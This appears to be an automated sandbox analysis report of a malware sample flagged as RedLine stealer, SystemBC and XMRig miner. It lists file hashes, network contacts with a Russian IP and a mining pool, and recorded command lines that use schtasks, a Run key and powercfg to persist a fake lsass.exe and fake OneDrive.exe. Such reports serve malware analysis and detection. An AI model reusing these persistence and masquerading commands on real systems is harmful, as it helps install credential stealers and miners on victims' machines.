powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 22:40 /du 23:59 /sc daily /ri 1 /f

C:\ProgramData\lsass\lsass.exe

"C:\ProgramData\lsass\lsass.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1391.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 7

Network

Country Destination Domain Proto
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 maper.info udp
DE 148.251.234.93:443 maper.info tcp
DE 148.251.234.93:443 maper.info tcp
US 8.8.8.8:53 pool.hashvault.pro udp
US 142.202.242.43:80 pool.hashvault.pro tcp

Files

memory/1340-54-0x0000000000D60000-0x0000000000D78000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 9617b66fe0df3d853bd99325930c345c
SHA1 4cab6df7c4aeb0609c417408d751e65f5f918d47
SHA256 7676b8816f31a7c148c90402c6b1a3e66757cdc1bc6874409b3c54db530d6ba8
SHA512 4208d6b4e1165cee674db2a987dcf1e6a24860dd536ed2a80270439a42da3bf65cbaaf93452370d1504e8490625f25c0876aefd23617ee7892123b1482efed87

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 9617b66fe0df3d853bd99325930c345c
SHA1 4cab6df7c4aeb0609c417408d751e65f5f918d47
SHA256 7676b8816f31a7c148c90402c6b1a3e66757cdc1bc6874409b3c54db530d6ba8
SHA512 4208d6b4e1165cee674db2a987dcf1e6a24860dd536ed2a80270439a42da3bf65cbaaf93452370d1504e8490625f25c0876aefd23617ee7892123b1482efed87

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FMTRXTWDQ21VCOXGHMV6.temp

MD5 9617b66fe0df3d853bd99325930c345c
SHA1 4cab6df7c4aeb0609c417408d751e65f5f918d47
SHA256 7676b8816f31a7c148c90402c6b1a3e66757cdc1bc6874409b3c54db530d6ba8
SHA512 4208d6b4e1165cee674db2a987dcf1e6a24860dd536ed2a80270439a42da3bf65cbaaf93452370d1504e8490625f25c0876aefd23617ee7892123b1482efed87

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 9617b66fe0df3d853bd99325930c345c
SHA1 4cab6df7c4aeb0609c417408d751e65f5f918d47
SHA256 7676b8816f31a7c148c90402c6b1a3e66757cdc1bc6874409b3c54db530d6ba8
SHA512 4208d6b4e1165cee674db2a987dcf1e6a24860dd536ed2a80270439a42da3bf65cbaaf93452370d1504e8490625f25c0876aefd23617ee7892123b1482efed87

memory/2044-74-0x000000001B140000-0x000000001B422000-memory.dmp

memory/1948-75-0x0000000001EC0000-0x0000000001EC8000-memory.dmp

memory/2036-76-0x00000000027E4000-0x00000000027E7000-memory.dmp

memory/2044-77-0x0000000002820000-0x00000000028A0000-memory.dmp

memory/1948-80-0x0000000002580000-0x0000000002600000-memory.dmp

memory/2036-79-0x00000000027EB000-0x0000000002822000-memory.dmp

memory/2040-81-0x0000000002410000-0x0000000002490000-memory.dmp

memory/1948-82-0x0000000002580000-0x0000000002600000-memory.dmp

memory/1948-84-0x0000000002580000-0x0000000002600000-memory.dmp

memory/2044-85-0x0000000002820000-0x00000000028A0000-memory.dmp

memory/2040-83-0x0000000002410000-0x0000000002490000-memory.dmp

memory/2040-86-0x0000000002410000-0x0000000002490000-memory.dmp

memory/2044-87-0x0000000002820000-0x00000000028A0000-memory.dmp

memory/2044-78-0x0000000002820000-0x00000000028A0000-memory.dmp

memory/2040-89-0x0000000002410000-0x0000000002490000-memory.dmp

memory/1948-88-0x0000000002580000-0x0000000002600000-memory.dmp

memory/2044-90-0x0000000002990000-0x000000000299E000-memory.dmp

memory/2044-91-0x0000000002A50000-0x0000000002A60000-memory.dmp

memory/1948-92-0x0000000002580000-0x0000000002600000-memory.dmp

memory/1948-93-0x0000000002580000-0x0000000002600000-memory.dmp

memory/1948-94-0x0000000002580000-0x0000000002600000-memory.dmp

memory/1948-95-0x0000000002580000-0x0000000002600000-memory.dmp

\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 9617b66fe0df3d853bd99325930c345c
SHA1 4cab6df7c4aeb0609c417408d751e65f5f918d47
SHA256 7676b8816f31a7c148c90402c6b1a3e66757cdc1bc6874409b3c54db530d6ba8
SHA512 4208d6b4e1165cee674db2a987dcf1e6a24860dd536ed2a80270439a42da3bf65cbaaf93452370d1504e8490625f25c0876aefd23617ee7892123b1482efed87

memory/988-109-0x0000000002760000-0x00000000027E0000-memory.dmp

memory/988-110-0x0000000002760000-0x00000000027E0000-memory.dmp

memory/988-111-0x0000000002760000-0x00000000027E0000-memory.dmp

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

memory/988-118-0x000000000276B000-0x00000000027A2000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/1796-121-0x000000013FDD0000-0x000000014079A000-memory.dmp

memory/1596-122-0x0000000000400000-0x000000000058B000-memory.dmp

\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 9617b66fe0df3d853bd99325930c345c
SHA1 4cab6df7c4aeb0609c417408d751e65f5f918d47
SHA256 7676b8816f31a7c148c90402c6b1a3e66757cdc1bc6874409b3c54db530d6ba8
SHA512 4208d6b4e1165cee674db2a987dcf1e6a24860dd536ed2a80270439a42da3bf65cbaaf93452370d1504e8490625f25c0876aefd23617ee7892123b1482efed87

memory/1708-135-0x00000000001C0000-0x00000000005E0000-memory.dmp

\??\c:\users\admin\appdata\roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/1016-138-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/1016-140-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/1016-139-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/1596-141-0x0000000000400000-0x000000000058B000-memory.dmp

memory/1800-142-0x000000013FD10000-0x00000001406DA000-memory.dmp

memory/1708-143-0x00000000001C0000-0x00000000005E0000-memory.dmp

memory/1708-144-0x00000000001C0000-0x00000000005E0000-memory.dmp

memory/1708-145-0x0000000005CC0000-0x0000000005D00000-memory.dmp

memory/1800-149-0x000000013FD10000-0x00000001406DA000-memory.dmp

memory/1412-150-0x0000000000040000-0x0000000000060000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\??\c:\programdata\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Local\Temp\tmp1391.tmp.bat

MD5 0c47727603dcd8c9535e535ef622f0dc
SHA1 54c488615a29834b97b64e2ce20a43f0287abffe
SHA256 43e6ecdf78f3ec54839ebfb1107ed8871953730db7a27b126911442a8aca526e
SHA512 6d63d55382c671b0a1da67829536f2b4329e652237e00dba8a6f5ae86dccd384696f2d4b90c0c0a32ea5fd2cf0143a96e01af1bb0bffacc55c2fdfdd42b2941d

memory/1668-167-0x0000000000B40000-0x0000000000F60000-memory.dmp

memory/1668-168-0x0000000000B40000-0x0000000000F60000-memory.dmp

memory/1708-169-0x00000000001C0000-0x00000000005E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp1391.tmp.bat

MD5 0c47727603dcd8c9535e535ef622f0dc
SHA1 54c488615a29834b97b64e2ce20a43f0287abffe
SHA256 43e6ecdf78f3ec54839ebfb1107ed8871953730db7a27b126911442a8aca526e
SHA512 6d63d55382c671b0a1da67829536f2b4329e652237e00dba8a6f5ae86dccd384696f2d4b90c0c0a32ea5fd2cf0143a96e01af1bb0bffacc55c2fdfdd42b2941d

memory/1668-172-0x0000000005E60000-0x0000000005EA0000-memory.dmp

memory/1668-171-0x0000000000B40000-0x0000000000F60000-memory.dmp

C:\Users\Admin\Desktop\DebugPublish.txt

MD5 398fdfdd239cf5138e7cf3957564c598
SHA1 d7604a7d7d8a74db27bfe28c010018e4bea62e76
SHA256 c634e599760b3df74e50dce9376fcd57fd4f233abc88aa9df78fe6e1ff92ba86
SHA512 a170ac75f27f070823c94152e94726a03d7ec1c5a781ff94bdfe5d145897093a7bc0ae5c83d1740f066c6a7a25b6d32e9f348bf14d868145afa684cb4956905d

C:\Users\Admin\Desktop\SuspendRedo.txt

MD5 25d1e0d1440768a9b8a914eea5b36fcc
SHA1 2596b9349d41607f13715bd1f252a481e3d953b8
SHA256 79d2eae0bf763deefb4c0520428a176ed3eba5abd4d4362c2480b123394c8a62
SHA512 24093f065662a458ec1601c1dbd3ff186d2bbf4c4220bf6726256214d91c2241755822206c8c03e39064e39379744421b7cca58851b20a7159dca0eb2abb73e1

memory/1412-221-0x0000000001FB0000-0x0000000001FD0000-memory.dmp

memory/556-229-0x0000000140000000-0x0000000140029000-memory.dmp

memory/1412-230-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1668-231-0x0000000000B40000-0x0000000000F60000-memory.dmp

memory/556-233-0x0000000140000000-0x0000000140029000-memory.dmp

memory/1412-234-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1668-235-0x0000000000B40000-0x0000000000F60000-memory.dmp

memory/1668-236-0x0000000000B40000-0x0000000000F60000-memory.dmp

memory/1412-237-0x0000000001FB0000-0x0000000001FD0000-memory.dmp

memory/1412-240-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1668-241-0x0000000000B40000-0x0000000000F60000-memory.dmp

memory/1412-244-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1668-245-0x0000000000B40000-0x0000000000F60000-memory.dmp

memory/1412-248-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1668-249-0x0000000000B40000-0x0000000000F60000-memory.dmp

memory/1412-251-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1668-253-0x0000000000B40000-0x0000000000F60000-memory.dmp

memory/1412-255-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1668-257-0x0000000000B40000-0x0000000000F60000-memory.dmp

memory/1412-259-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1668-261-0x0000000000B40000-0x0000000000F60000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-06 20:29

Reported

2023-05-06 20:37

Platform

win10v2004-20230220-en

Max time kernel

150s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detects Redline Stealer samples

stealer
Description Indicator Process Target
N/A N/A N/A N/A

RedLine

infostealer redline

SystemBC

trojan systembc

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1740 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
